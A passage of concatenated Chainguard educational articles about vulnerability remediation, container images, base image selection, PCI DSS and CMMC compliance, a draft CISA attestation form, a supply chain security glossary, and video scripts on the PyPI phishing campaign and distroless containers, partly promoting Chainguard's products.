Here, you can learn what steps should be taken to address the vulnerability. Oftentimes, this will include updating dependencies to patched versions. After you have followed guidance to fix the vulnerability, you should scan your software again to ensure that it was properly remediated. Note that not all true positive vulnerabilities may be remediable. In some cases, a patch is not yet made available to address the vulnerability, or updating the package version may introduce breaking changes to your program. In situations like these, focus on what you can remediate given your resources at the time. Vulnerabilities in Container Images Container images are like little bundles of code containing the files and dependencies they each need to run. They are called containers because they operate as a discrete unit; each container has what it needs, and can run independently from other containers. Container images are helpful as they prevent inputs, permissions, and dependencies from clashing with one another. However, containers are prone to accumulating vulnerabilities if they are not properly maintained. As vulnerabilities are discovered and reported, containers should be rebuilt to use updated, secured versions, or else they will begin to collect vulnerabilities. Research from Chainguard Labs has shown that container images from Docker Hub, a popular container image registry, will accumulate one vulnerability per day if not updated. To combat the accumulation of vulnerabilities in containers, you should choose lightweight, minimal container images which are frequently rebuilt. Popular container images often come bundled with hundreds of packages, some of which may be unnecessary for your applications. These extra components contribute to vulnerability accumulation as they don’t necessarily add functionality, but add more vectors to attack. Using a distribution such as Alpine Linux or the Wolfi undistro, both of which prioritize security and size, can reduce dead weight in your containers. In addition, frequently rebuilding your images ensures that packages are up-to-date and include security patches. Chainguard Containers offer minimal, frequently rebuilt images to help you reduce vulnerabilities present in your containers. Built on top of Wolfi, the goal of Chainguard Containers is to minimize total attack surface and update continuously in order to reduce your CVE count. The following graph illustrates the drastic reduction in CVEs seen by switching from an official base image to its Chainguard Containers variant. Python Comparing the latest official Python image with cgr.dev/chainguard/python Check out our article on selecting a base image to explore more factors that should impact your container image choice. Next Steps After identifying, triaging, and remediating vulnerabilities, you will be left with both a better understanding of your software and a more secure product. However, vulnerability remediation does not stop there. As your software is developed further, new vulnerabilities may be introduced or discovered. It is important to continue scanning your software frequently in order to address any new security concerns that may arise. Learn More Vulnerability management can be daunting at first, especially when your scanners report high CVE counts across hundreds of project dependencies. By leveraging the tools and procedures fit for your needs, you can work towards securing your software, one vulnerability at a time. In this article, you learned four steps that you can take towards reducing vulnerabilities in your software. You learned how you can use resources such as SBOMs, VEX, and the KEV Catalog to aid you in vulnerability triage. In addition, you explored factors that impact triage and remediation, and how you can choose container images with less vulnerabilities. To learn more about software vulnerabilities, you can read our other articles about CVEs. For more information on getting started with Chainguard Containers, check out our website and documentation. --- ### Simplify Your Path to PCI DSS 4.0 Compliance with Chainguard URL: https://edu.chainguard.dev/software-security/compliance/pci-dss-4/pci-dss-chainguard/ Last Modified: August 21, 2024 Tags: compliance, PCI DSS 4.0, standards Compliance with PCI DSS 4.0, or Payment Card Industry Data Security Standard, requires adherence to strong security standards. Rigorous requirements must be met in order to secure your networks, systems, storage, and access according to the guidelines. Chainguard doesn’t build images specifically for PCI DSS, but our images can help you meet the requirements in many ways, easing your burden in the process of achieving compliance. Securing your software supply chain provides a solid foundation for minimizing vulnerabilities. All Chainguard Containers save time and costs required to triage, patch, and remediate CVEs. They are created by and officially maintained by Chainguard engineers. Our images are designed to be minimal, removing unnecessary software that is not specifically used. This eliminates a number of potential attack vectors. On top of this, you must authenticate into Chainguard to use Chainguard Containers, giving you reassurance of the provenance of your images. They include digitally signed build-time SBOMs (software bill of materials) documenting and attesting to the full provenance. Our FIPS-compliant Federal Information Processing Standard images, combined with STIG-hardened (Security Technical Implementation Guide) configurations, provide an even stronger foundation for meeting the requirements of PCI DSS even because they are hardened further to meet the more stringent FedRAMP requirements. What are STIG-Hardened FIPS Images? STIG-hardened FIPS images are pre-configured container images that have been secured according to the Security Technical Implementation Guide (STIG) standards set by the Defense Information Systems Agency (DISA). These images meet stringent federal security requirements, combining FIPS-compliant encryption with robust security configurations that protect against vulnerabilities and threats. By using STIG-hardened FIPS images, organizations ensure that their systems adhere to federal encryption standards and best practices for cybersecurity, making them particularly valuable in environments that require high levels of security. How do Chainguard Containers Help? One of the main requirements of PCI DSS is to maintain a vulnerability management program. PCI DSS requires you to scan for vulnerabilities once every three months (Requirement 11.3.1) and triage and address all vulnerabilities (Requirement 11.3.11). Chainguard protects you from malicious attacks by supplying you with images where CVEs have already been dealt with, removing vulnerabilities for you. PCI DCC requires that you catalog and classify vulnerabilities bespoke and third-party software (Requirements 6.3.1 and 6.3.2). You must fix all critical and high vulnerabilities and have a plan of action for the rest (Requirement 11.4.4). Chainguard does that for you. Vulnerability scanners can be noisy and sifting through false positives while cataloging true vulnerabilities can be tedious work. Providing justifications for vulnerabilities that aren’t applicable takes time, and that is after investigating them thoroughly. Chainguard Containers are carefully engineered to contain low-to-no CVEs. Organizations can use them as their source to build their applications on. The benefits of our solution are: You’re secured by default : Our images contain low-to-no CVEs. Check out our Images Directory yourself. ‍ Extensive scanner partnerships: We partner with the industry-leading scanners such as Snyk, Crowdstrike, and Wiz. ‍ SBOM for all Chainguard Containers: Get full transparency into the packages actually used in our images and ultimately run in your environment. ‍ Less ongoing human overhead: Every new Chainguard Container version is carefully scanned and any addressable CVEs are fixed. ‍ Trust in our industry leading [CVE SLA](https://www.chainguard.dev/cve-sla): We are committed to supplying secure software and commit to fixing CVEs so you don’t have to. Browse all CMMC 2.0 Articles Introduction to PCI DSS 4.0 Overview of PCI DSS 4.0 Practices/Requirements (Current article) How Chainguard Can Help With CMMC 2.0 Get started with FIPS Chainguard Containers today! --- ### Simplify Your Path to CMMC 2.0 Compliance with Chainguard URL: https://edu.chainguard.dev/software-security/compliance/cmmc-2/cmmc-chainguard/ Last Modified: August 15, 2024 Tags: compliance, CMMC 2.0, standards Achieving Cybersecurity Maturity Model Certification (CMMC) 2.0 Level 2 or Level 3 certification can be a complex and resource-intensive process, particularly for organizations managing containerized environments and addressing vulnerabilities. Chainguard simplifies this journey by offering specialized solutions that drastically reduce the time and effort needed to meet compliance requirements. Our FIPS-compliant Federal Information Processing Standard images, combined with detailed SBOM (Software Bill of Materials) and STIG-hardened (Security Technical Implementation Guide) configurations, provide a strong foundation for meeting the requirements of CMMC 2.0. What are STIG-Hardened FIPS Images? STIG-hardened FIPS images are pre-configured container images that have been secured according to the Security Technical Implementation Guide (STIG) standards set by the Defense Information Systems Agency (DISA). These images meet stringent federal security requirements, combining FIPS-compliant encryption with robust security configurations that protect against vulnerabilities and threats. By using STIG-hardened FIPS images, organizations ensure that their systems adhere to federal encryption standards and best practices for cybersecurity, making them particularly valuable in environments that require high levels of security, such as those governed by CMMC 2.0. Why STIG-Hardened FIPS Images for CMMC 2.0? STIG-hardened FIPS images are highly beneficial for achieving CMMC 2.0 compliance due to their enhanced security features and adherence to strict guidelines. Here’s how they can support your CMMC 2.0 efforts: Enhanced Security Posture STIG hardening applies a set of security configurations and practices designed to protect systems from vulnerabilities and threats. By utilizing STIG-hardened FIPS images, organizations ensure that their systems meet rigorous security standards, reducing the risk of exploitation. This is particularly important for CMMC 2.0 Level 2 and Level 3 requirements, which emphasize advanced security practices and robust protection of Controlled Unclassified Information (CUI) and Federal Contract Information (FCI). Streamlined Compliance FIPS-compliant images meet federal encryption standards, which are a key component of CMMC 2.0 requirements. STIG hardening adds an additional layer of security by ensuring that the system configurations are in line with best practices for securing systems. These hardened images come with pre-configured settings that address many of the CMMC controls, such as those related to access control, vulnerability management, and incident response, thereby simplifying the compliance process and reducing the time and effort needed to achieve certification. Simplified Reporting and Documentation STIG-hardened FIPS images typically include detailed scan reports and documentation that can be used to demonstrate compliance with CMMC 2.0 controls. These reports help organizations quickly identify and address security gaps, and the detailed documentation supports the creation of necessary reports for auditors and assessors. This streamlining of the reporting process aids in maintaining and proving compliance with CMMC requirements, such as those related to vulnerability management (e.g., CM.2.062 and CM.3.068) and continuous monitoring (e.g., SC.3.177). By leveraging Chainguard’s resources, organizations can accelerate their path to CMMC 2.0 certification while effectively managing and reporting on critical security controls. Our integrated approach not only ensures that compliance requirements are met but also enhances overall security posture, allowing organizations to focus on their core operations with confidence. Browse all CMMC 2.0 Articles Introduction to CMMC 2.0 CMMC 2.0 Maturity Levels Overview of CMMC 2.0 Practice/Control Groups (Current article) How Chainguard Can Help With CMMC 2.0 Get started with FIPS Chainguard Containers today! --- ### What are Containers? URL: https://edu.chainguard.dev/software-security/what-are-containers/ Last Modified: October 31, 2023 Tags: Conceptual, Overview Maximizing the performance of computer hardware has been a critical undertaking for software engineers for decades. First developed in the 1960s, virtual machines (VMs) were an early answer to this challenge, allowing a single computer to host multiple, isolated operating systems. VMs enable different guest users or processes to share physical infrastructure while keeping their concurrent operations separated. However, as VMs are both slow to initialize and resource-intensive, a modern solution arrived in the early 2000s: containers. Containers share a common kernel with each other, whereas multiple VMs each require their own virtual kernel. The kernel resides at the core of an operating system and facilitates activities between hardware and software. By sharing a kernel, containers run concurrently using the same infrastructure, providing the isolation benefits of VMs without added resource taxation. Containers have become increasingly popular for their relative ease of use, reproducibility, and portability in deploying applications across systems for a low resource cost. This article explores the structure of container images, the foundational unit behind containers, such as their key contents and the processes used to construct them. You will learn how containers operate on top of their container engine and associated infrastructure. You will also learn how to get started with using containers, including building, choosing and deploying container images for your applications. Structure of a Container Image In order to build a container for your application, you will need to start with a container image. A container image is a static, immutable filesystem bundle that serves as a blueprint you can use to build containers. Inside every container image is a curated collection of the files, dependencies and code needed to run an application. At runtime, when a container is built from an image, the resultant container inherits all characteristics of the container image it is instantiated from. To start creating a container image, you must first select a base image. A base image is a foundational image that can be built upon through the addition of image layers. Typically, base images come pre-bundled with a specific Linux distribution. Every distribution differs in its size, dependencies, and functionality, making certain distributions better suited for certain images over others. After selecting a base image, there are a few different ways you can introduce tailored functionality (such as your application-specific code or dependencies) to the image. Many developers today use Docker, a tool used to deploy containerized applications, which ingests a Dockerfile, a machine-readable configuration document containing the instructions to assemble an image with multiple layers. Aside from Dockerfiles, you can use tools such as apko and ko to build images, though they produce images using a single-layer construction method. For example, say you want to build a container to run your Python application. You can start your container image with a Python base image, such as a Wolfi-based image. Then, you can add your application and its relevant dependencies to the image through the layers in a Dockerfile. The resultant image is now ready to be deployed with your application bundled inside. Instantiating Containers Once you have selected or assembled a container image for your application, you will use it to instantiate a running container. Deploying live containers from an image requires a container engine, which is the software that allows for the hosting of multiple containers on one shared machine. Docker Engine is a prominent example of a container engine. A container engine communicates with the kernel of the operating system of the host it is being run on. Within a container engine, multiple containers run independently of each other. These containers are composed of the code, dependencies, and configurations of their parent images. The following graphic depicts this hierarchical relationship between containers and the container engine. Getting Started with Containers Depending on your application, you may not need to build your own container images from scratch. Instead, you can pull a container image from a container registry. Container registries are centralized repositories with images available to be pulled. A popular container registry, Docker Hub, hosts hundreds of thousands of open source container images that can be pulled and used. Other container registries include the GitHub Container Registry and the Google Artifact Registry. Additionally, the Chainguard registry offers a free public catalog of secure, minimal base images that provide a strong foundation for containerizing your applications. There are many factors to consider when choosing a container image for your application. At minimum, your container image will need to have the core packages and components required to support your programs. However, with thousands of options to choose from, some images will be better for your use case than others. Choosing a container image that offers security and reliability in addition to core functionality is important. Some images may contain multitudes of unneeded components and packages, thus unnecessarily contributing to your data egress and vulnerability counts. To learn more about choosing a container image that is right for your applications, check out our article on selecting a base image. Learn More This article covered the fundamentals of container technology, including the processes behind building container images tailored to your specific needs. You learned how you can deploy containers from images for your applications using a container engine. Additionally, you explored various container registries that you can pull images from for your next project. To get started with using containers for the first time, check out our documentation on Chainguard Containers, our hardened, minimal images ideal for deploying secure containerized applications. If you want to build your own images, check out Wolfi, the Linux undistro ideal as a base of lightweight containers. Lastly, you may also be interested in learning about the Open Container Initiative, which sets standards for image formats, runtimes, and distributions. We encourage you to check out our article titled “What is the Open Container Initiative?”. --- ### CISA Secure Software Development Attestation Form (Draft) URL: https://edu.chainguard.dev/software-security/secure-software-development/ssd-attestation-form/ Last Modified: May 10, 2023 Tags: Reference Attestation and Signature On behalf of the above-specified company, I attest that [software producer] presently makes consistent use of the following practices, drawn from the secure software development framework (SSDF), in developing the software identified in Section I: The software is developed and built in secure environments. Those environments are secured by the following actions, at a minimum: Separating and protecting each environment involved in developing and building Software; Regularly logging, monitoring, and auditing trust relationships used for authorization and access: to any software development and build environments; and among components within each environment; Enforcing multi-factor authentication and conditional access across the environments relevant to developing and building software in a manner that minimized security risk; Taking consistent and reasonable steps to document as well as minimize use or inclusion of software products that create undue risk within the environments used to develop and build software; Encrypting sensitive data, such as credentials, to the extent practicable and based on risk; Implementing defensive cyber security practices, including continuous monitoring of operations and alerts and, as necessary, responding to suspected and confirmed cyber incidents; The software producer has made a good-faith effort to maintain trusted source code supply chains by: Employing automated tools or comparable processes; and Establishing a process that includes reasonable steps to address the security of third-party components and manage related vulnerabilities; The software producer employs automated tools or comparable processes in a good-faith effort to maintain trusted source code supply chains; The software producer maintains provenance data for internal and third-party code incorporated into the software; The software producer employs automated tools or comparable processes that check for security vulnerabilities. In addition: The software producer ensures these processes operate on an ongoing basis and, at a minimum, prior to product, version, or update releases; and The software producer has a policy or process to address discovered security vulnerabilities prior to product release; and The software producer operates a vulnerability disclosure program and accepts, reviews, and addresses disclosed software vulnerabilities in a timely fashion. I attest that all requirements outlined above are consistently maintained and satisfied. I further attest the company will notify all impacted agencies if conformance to any element of this attestation is no longer valid. Please check the appropriate boxes below, if applicable: There are addendums and/or artifacts attached to this self-attestation form, the title and contents of which are delineated below the signature line. I attest that the referenced software has been verified by a certified FedRAMP Third Party Assessor Organization (3PAO) or other 3PAO approved by an appropriate agency official, and the Assessor used relevant NIST Guidance, which includes all elements outlined in this form, as the assessment baseline. Relevant documentation is attached. References The Draft of the Secure Software Development Self Attestation Form available on cisa.gov, was released as part of a Request For Comments on April 27, 2023. Comments are due on June 26, 2023. Reprinted courtesy of the National Institute of Standards and Technology, U.S. Department of Commerce. Not copyrightable in the United States. --- ### Selecting a Base Container Image URL: https://edu.chainguard.dev/software-security/selecting-a-base-image/ Last Modified: August 4, 2022 Tags: Conceptual Software teams building and deploying container-based software applications often use a “base image,” an initial set of software packages often associated with a Linux distribution. Software developers, security professionals, and infrastructure teams seeking to make an informed decision about what base image to use must consider a number of criteria when selecting a base image appropriate for their needs. To help these parties make a more informed decision when selecting a base image, this article describes a range of criteria: Ensuring the image contains needed core functionality The number of known vulnerabilities The frequency at which the image is rebuilt The number of packages The update frequency and security hygiene of the underlying distribution The amount of maintainer support associated with the base image The size of the image in MB Whether the image is signed Whether the image has an SBOM After reading this section, software professionals will have a mental checklist that makes them better prepared to select a base image for container-based software applications. Ensure the base image contains needed core functionality First and foremost, the base image needs to contain the necessary minimum functionality. For instance, for a team that is developing a Python application, this would include the Python runtime, the software that translates source code into machine code. Without the appropriate core functionality, the base image will be unable to serve the needs of the software developer and his or her application. More technical users might also be interested in aspects such as whether there is glibc or musl support. Choose an image with few or no known vulnerabilities Another key factor is the number of known vulnerabilities associated with the packages inside the image. Popular open source scanners such as trivy and grype allow a user to scan container images to identify vulnerabilities. Known vulnerabilities, consistently ranked a critical security threat for web applications, allow attackers to exploit a piece of software without the work of discovering a previously unknown vulnerability. Recent empirical software security research indicates that many popular images have hundreds of known vulnerabilities. Software teams should select base images with as few known vulnerabilities as possible. This not only has security benefits but also reduces the toil of manually triaging vulnerabilities, i.e. determining whether the vulnerability is a true positive or false positive and whether the vulnerability is exploitable in the context of the deployed application. While some specialists point out that many reported vulnerabilities have never been known to be exploited in the wild, this observation should not be mistaken as an invitation to disregard vulnerability counts. Because many, perhaps most, compromises are never reported, any list of vulnerabilities known to have been exploited should be treated as imperfect knowledge. Other vulnerabilities might have been exploited in the wild and no defender knows yet. In short, maintaining a low known vulnerability count reduces security risk and staff toil, thereby enabling faster development. Choose an image that is frequently rebuilt Of course, choosing an image that has a low vulnerability count today does not guarantee a low vulnerability count tomorrow. New vulnerabilities can arise, new non-security bugs are patched, and new features emerge for the many packages inside a base image. To enable a software team to take advantage of new fixes, security or otherwise, developers ought to prefer images that are rebuilt frequently. Rebuilding entails using the latest versions of all the constituent packages, which reduces the vulnerability count and enables downstream consumers of the base image to upgrade the version if desired. Some research suggests that over half of the container images found on Docker Hub, a repository for container images, haven’t been updated for four months or longer. Likewise, official Docker images can have similarly slow update cadences. When selecting a base image, a software team should examine the frequency of updating. Choose an image with a minimal number of packages Choosing base images with a minimal number of packages is also a sensible principle. This reduces the “attack surface” and also reduces complexity. Fewer packages, all things equal, means fewer vulnerabilities (both known and unknown). Additionally, for teams that must use a pinned imaged and thus can’t take advantage of frequent rebuilds, fewer packages also means a slower vulnerability accumulation rate. Additionally, choosing “distroless” images, which strips out package managers, package manager dependencies, and other build-time dependencies, is another way to ensure that your team is choosing a secure-by-default base image. Choose an image based on a software distribution that prioritizes package update frequency and security hygiene The packages inside a container are often sourced from a Linux distribution such as Debian, Ubuntu, or Wolfi. The update frequency and hence the security of an image therefore also depends on the software development practices associated with that distribution. Software teams should therefore assess the distribution underlying the packages in their images. All things equal, software teams should prefer a distribution that prioritizes frequent updates so that vulnerabilities are quickly fixed. Choose an image with maintainers that actively support it Not all container images are actively maintained. Like open source software packages in general, container images require one or more persons to ensure timely and frequent rebuilds, manage broader security concerns, and respond to bugs and issues. Unmaintained or lightly maintained images can pose a problem to software teams that want to prioritize development velocity and security. Without the ability to rapidly work with upstream image maintainers, software teams must either accept the risk of using old versions of the image that potentially have unpatched bugs, or consider creating and maintaining a fork with the overhead associated with that course of action. Choose an image that is smaller Smaller images (fewer MB) means less storage costs and less transmission costs. When an image is pulled thousands of times a day, even a small difference in size can quickly add to the cost. Choose an image that is signed Software signing ensures that attackers that tamper with a software artifact, such as a container image, can be detected. Software teams should choose to use container images that have been signed, with tools such as Cosign, and verify the signatures to ensure that the images on which they depend are tamper-free. Choose an image with an SBOM A software bill of materials (SBOM), a list of ingredients for a piece of software, provides visibility into the components of a piece of software, enabling transparency and informed decision-making. Choosing base images with SBOMs generated by the party responsible for building the artifact helps the image consumer make better-informed decisions related to the security and health of the code. Self-assessment [True or False] The frequency at which a container image is rebuilt does not affect the number of known software vulnerabilities associated with the container image. False: Infrequently rebuilt images accumulate vulnerabilities as new vulnerabilities are discovered for the packages inside an image. [True or False] Choosing base images with few or no known vulnerabilities reduces security risk and reduces staff toil. True: Fewer known vulnerabilities, all things equal, makes the attacker's job harder and reduces the vulnerability triage burden on security teams and developers. For readers interested in an example of images that prioritize the criteria described above, Chainguard Containers offers one option. --- ### What is software supply chain security URL: https://edu.chainguard.dev/software-security/what-is-software-supply-chain-security/ Last Modified: August 4, 2022 Tags: Conceptual An earlier version of this material was published in the first chapter of the Linux Foundation Sigstore course. Software producers have a supply chain just like manufacturing businesses have a supply chain. And just like manufacturers require physical inputs and then perform a manufacturing process to build a finished product, so do software producers, whether the producer is a company or individual. In other words, a software producer uses components, developed by third parties and themselves, and technologies to write, build, and distribute software. A compromise introduced anywhere in this chain is an example of a software supply chain security issue. Some observers might think that all software security issues are software supply chain issues. How else would vulnerabilities end up in the finished software if not through the software supply chain? A generic example can help illustrate the difference. Imagine ACME company unintentionally creates a SQL injection vulnerability in a piece of software that ACME company distributes. This is not a software supply chain security issue. Code from ACME’s own developers is responsible for this security issue. But should ACME company use an open source software component that has been maliciously tampered with to send sensitive secrets to an attacker when the code was built, then ACME would be the victim of a software supply chain attack. In that case, the supply chain of ACME’s developers is the origin of the security issue. Software supply chain compromises can involve both malicious and unintentional vulnerabilities. The insertion of malicious code anywhere along the supply chain poses a severe risk to downstream users, but unintentional vulnerabilities in the software supply chain can also lead to risks should some party choose to exploit these vulnerabilities. For instance, the log4j (PDF) open source software vulnerability in late 2021 exemplifies the danger of vulnerabilities in the supply chain, including the open source software supply chain. In this case, log4j, a popular open source Java logging library, had a severe and relatively easily exploitable security bug. Many of the companies and individuals using software built with log4j found themselves vulnerable because of this bug. Malicious attacks, or what often amounts to code tampering, deserve special recognition though. In these attacks, an attacker controls the functionality inserted into the software supply chain and can often target attacks on specific victims. These attacks often prey on the lack of integrity in the software supply chain, taking advantage of the trust that software developers place in the components and tools they use to build software. Notable attack vectors include compromises of source code systems, such as GitHub or GitLab; build systems, like Jenkins; and publishing infrastructure attacks on either corporate software publishing servers, update servers, or on community package infrastructure. Another important attack vector is when an attacker steals the credentials of an individual open source software developer and adds malicious code to a source code management system or published package. Fortunately, a number of promising counters to software supply chain attacks have emerged. For instance, projects like Sigstore offer a chance to restore integrity to the software supply chain and initiatives like the Open Source Security Foundation provide a forum for concerted action. Further information on software supply chain security compromises and counters can be found in this reading list. One further term merits a definition and explanation. Cloud-native software supply chain security refers to software supply chain security efforts that are related to container technology. The process of selecting, building, and operating containers has a number of important implications for software supply chain security. For instance, signing containers with a digital signature (via a tool like Cosign) is one way to ensure that an attacker that tampers with a container is detected. Container technology both epitomizes the potential software supply chain security perils that modern organizations must confront while also enabling approaches that can make a software supply chain secure by default. --- ### Chainguard Glossary URL: https://edu.chainguard.dev/software-security/glossary/ Last Modified: August 10, 2023 Tags: Conceptual General terms Software supply chain Like in material good supply chains, a software supply chain is composed of activities that an organization undertakes to deliver an end product or service to a consumer. Software supply chain activities involve the transformation of dependencies, packages, components, binaries, build and packaging scripts, code and other software artifacts, and infrastructure into a finished software deliverable that is deployed into production. Participants in the supply chain include actors like developers, reviewers, testers, and maintainers who are working on the product at hand, but also includes those who maintain and contribute to packages and package managers, and other software that may be incorporated into a given product. Software supply chains also include information relevant to the software, such as versioning, signatures, and hashes. Software supply chain attacks An intentional act of inserting malicious functionality into — or taking advantage of a known vulnerability within — the build, source, components or deployment software or infrastructure with the goal of propagating that harmful functionality through current distribution methods. Software development life cycle The methodology and process for planning, designing, creating, testing, deploying, and maintaining software. Software artifact An artifact is an immutable blob of data. Examples of artifacts include a file, a git commit, a container image, a firmware image. Software vulnerability A software vulnerability is a weakness in a program which, if left unaddressed, may be used by attackers to access, manipulate, or compromise a computer system. A vulnerability can impact various parts of a system depending on where or how it is introduced, and can be targeted through different vectors based on the type of weakness it introduces. Developers refer to vulnerabilities by their corresponding CVE ID when patching or remediating any known security flaws. Attestation An attestation allows consumers of a software artifact to verify the quality of that artifact independently from the producer of the software. It also requires software producers to provide verifiable proof of the quality of their software. You can think of an attestation as a proclamation that software artifact X was produced by Y person at Z time. CI/CD A pipeline approach to code development and release. CI stands for continuous integration, referring to the automation of testing code modifications frequently to avoid conflict between developer changes. CD stands for continuous delivery and/or deployment, referring to the next stage of the pipeline where code is automatically merged to a repository or production environment after passing tests to fast-track the release of new changes to customers. CI/CD aims to reduce slowdowns experienced by manual code checking and approval, shortening the development cycle and allowing for more updates to reach consumers. CISA The Cybersecurity and Infrastructure Security Agency (CISA) is a U.S. federal government agency under the Department of Homeland Security. Since its inception in 2018, CISA has championed the adoption of secure software development practices, such as the use of SBOMs and VEX documentation. CISA operates the Known Exploited Vulnerabilities (KEV) Catalog, a helpful tool to software developers who are working on vulnerability remediation. Additionally, they sponsor the National Vulnerability Database (NVD). CVE Standing for Common Vulnerabilities and Exposures, CVEs are records assigned to publicly disclosed software vulnerabilities, stored in a searchable catalog. Each CVE consists of a unique CVE ID, a description of the vulnerability, and any relevant references or advisories. The CVE Program is operated by The MITRE Corporation and supported by a variety of U.S. government agencies. KEV Catalog The Known Exploited Vulnerabilities (KEV) Catalog is populated with CVEs that have existing exploits “in the wild”. Operated by the Cybersecurity and Infrastructure Security Agency (CISA), the KEV Catalog serves as a tool for developers as it identifies CVEs that need to be prioritized for remediation because of their exploitability status. NVD The National Vulnerability Database (NVD) is operated by the National Institute of Standards and Technology (NIST), an agency of the U.S. Department of Commerce. The NVD analyzes CVE records and their related public advisories to provide additional information on how a vulnerability impacts a software product. The NVD is often used by vulnerability scanners as a primary reference. Provenance Provenance is the verifiable information about software artifacts describing where, when and how something was produced. Zero-day The origin and exact meaning of this term varies among sources, but a zero-day is a recently discovered vulnerability. One explanation for the term is that a zero-day vulnerability is a very new vulnerability for which there isn’t a fix, and developers have “zero days” to find a solution. Others define it as an unknown vulnerability or exploit already affecting your system. “Zero-day” refers to the age of the vulnerability, as derived from when you or your security org first becomes aware of it; because the vulnerability is “zero days” old, no one is yet aware of it and there isn’t a known fix for it. The derivative terms zero-day attack or zero-day exploit refer to an attack taking advantage of such a previously unknown vulnerability. Security tools and frameworks Certificate authority Often abbreviated as CA, a certificate or certification authority is a governing body that stores, signs, and issues digital certificates that can verify claims about the ownership of a given public key. Software consumers can use a CA to verify the assertions made about the private key that corresponds with the certified public key. A trusted third party, CAs use the X.509 or EMV standard to format certificates. Code signing The process of digitally signing software artifacts to verify the author of the software as well as guarantee that the code has not been altered in any way since it was signed. Cryptographic hashes are used to sign software in order to validate authenticity and integrity. Code signing results in a signature. OCI OCI stands for the Open Container Initiative, which is an open governance structure that was set up to create and foster open industry standards around software container formats and runtimes. OIDC OIDC is short for OpenID Connect, an identity layer that is built on top of the OAuth 2.0 protocol, and is governed by the OpenID Foundation. The tool allows for identity authentication and identity verification based on the authentication performed by a provider such as Apple, Google, GitLab, Microsoft, and others. PKI Standing for public key infrastructure, PKI arranges the necessary elements of infrastructure to manage public-key encryption, binding public keys with respective identities of entities (including individuals and organizations). Red teaming Conducting a red team assessment consists of a goal-based adversarial activity to demonstrate how attackers can combine exploits to compromise the integrity of software or other technology. SBOM An acronym, SBOM stands for a software bill of materials (plural: SBOMs or software bills of materials). An SBOM is like an electronic packaging slip or receipt, it is a formal record that contains the details and supply chain relationships (such as dependencies) of the components used in building given software. Sigstore A suite of tools to sign, verify, and monitor software artifacts. Within the umbrella of Sigstore are Cosign for artifact signing and verification, the certificate authority Fulcio, and the transparency log Rekor. All of this tooling can be used independently of each other. SLSA Standing for Supply chain Levels for Software Artifacts, SLSA (pronounced “salsa”) is a security framework that offers a check-list of standards and controls in order to prevent tampering, improve integrity, and secure packages and infrastructure. SLSA has a build track with three levels of increasing security. SSDF A project of the United States Department of Commerce’s National Institute of Standards and Technology (NIST), the Secure Software Development Framework (SSDF) is a set of guidelines and recommendations to establish a secure software development practice. Tekton Tekton provides a cloud-native solution for building CI/CD systems with a focus on software supply chain security through offering artifact signatures and attestations through Tekton Chains. TUF The Update Framework, known as TUF, offers a framework for securing software update systems. Attacks and vulnerabilities Codecov Hack An example of a software supply chain attack that took place in early 2021. The code coverage tool Codecov experienced a sophisticated attack in which their Bash uploader script was modified by a malicious actor. The affected script allowed the attacker to extract customer credentials passing through Codecov’s continuous integration (CI) platform, exposing services accessible with these credentials to further exploitation. Log4Shell An internet vulnerability involving a nearly ubiquitous piece of software, Log4j. The vulnerability received attention in December 2021 and much work was done to mitigate the vulnerability, which can be exploited by a remote code execution attack. SolarWinds Hack The commonly used term to refer to the software supply chain breach that involved the SolarWinds Orion system, which occurred in 2020. Hackers gained access to networks, systems, and data of thousands of SolarWinds customers, and compromised the systems of over 30,000 organizations who relied on Orion software. This was one of the largest software supply chain attacks of its kind recorded to date. Typosquatting Typosquatting is a cyber attack that is done by adversaries who try to pass a string (such as a URL) that they own as something that is official. For example, instead of the official chainguard.dev an adversary may register chain-guard.dev, cha1nguard.dev, or chainguar.dev in order to pretend to be the official site. --- ### WTF happened with the PyPI phishing attack? URL: https://edu.chainguard.dev/software-security/videos/pypi/ Last Modified: August 1, 2022 On 8/24/22, PyPI, an open source repository of software for the Python programming language, announced an active phishing campaign targeting PyPI users. How did it happen and how can we prevent future attacks? Let’s recap: Before we cover the phishing attack, it’s worthwhile to mention that on July eighth, PyPI announced it would require the implementation of two-factor authentication (2FA) for projects deemed critical — that is, any project in the top 1% of downloads of the past 6 months. It is a huge step forward for open source security, and as of August twenty-fourth (today/yesterday), nearly ~30k PyPI maintainers have 2FA enabled. About a month and a half later, on August, twenty-fourth, PyPI tweeted that they had reports of phishing, or fake emails, that appeared to be from PyPI requiring a mandatory validation process which led users to a fake login page. When the user went to enter credentials, they were stolen. Legitimate projects have been compromised, and malware published as the latest release for those projects. PyPI has already taken down several hundred typosquats of the malicious releases. It’s important to note that accounts protected by hardware security keys, the strongest form of 2FA, are not vulnerable. It is currently unclear if timed-based one-time passwords (for example a one-time use SMS pin) were affected. What happens now? PyPI is actively reviewing reports of new malicious releases, and ensuring that they are removed and the maintainer accounts restored. They are also recommending to reset passwords and 2FA recovery codes if you have entered your credentials to the phishing site. This attack highlights the importance of MFA, especially hardware or WebAuthn 2FA. Hardware keys are not vulnerable to these types of attacks because, in order to authenticate with it, you physically have to have the key, which makes it impossible for attackers to get the information they need to log in from afar. [Dan to show a Yubikey]. PyPI is run largely by volunteer maintainers who are working to make the open source ecosystem more secure. Having checks in place that may require a small amount of time for individual maintainers to set up can have an outsized impact on the overall wellness of the software supply chain. If you haven’t already, enable 2FA at https://pypi.org/2fa/ and shout out to the PyPI team for their transparency and their continued efforts toward keeping open source more secure! --- ### WTF is a distroless container? URL: https://edu.chainguard.dev/software-security/videos/distroless/ Last Modified: August 1, 2022 Have you heard of distroless container images? This video is going to break down what they are, how they work, and why they’re better. The easiest way to explain what a distroless container image is and how it differs from a traditional fat container image is by starting with the fat container image, then we’ll point out the parts that aren’t necessary and how distroless images let you build smaller, leaner, more secure container images. In a traditional fat container image like this one shown in the video, we have a bunch of different stuff installed in it. We start out with a package manager that we typically use to install a bunch of dependencies and then all the way on the other side we have our application. The dependencies that we install with the package manager might be needed to build our application or to operate it at runtime. Additionally, the package manager itself is an application and that comes with its own set of dependencies which we can see here. Some of those dependencies are used for our application because they might be shared or used for a bunch of different things, but some of those dependencies are only used for the package manager. All of those build tools and the package manager dependencies are left in the container image at the end, making it larger, taking up space, and potentially introducing an increased attack surface. The package manager itself and all of its dependencies and build tools aren’t actually needed at run time to operate our application, so a distroless container image works by stripping all of those out so that the only thing left in the image at runtime is your application and the exact dependencies that it needs. You don’t have the build tools, the compilers, the package manager or its dependencies. A fun metaphor or comparison is this massive ship here, full of giant containers and cranes used to load all of them. This is like a typical fat container image. Distroless images are so slim, you can hold them in your hand. It also makes them a lot more transparent and easier to use and see what’s inside of them. Another metaphor here 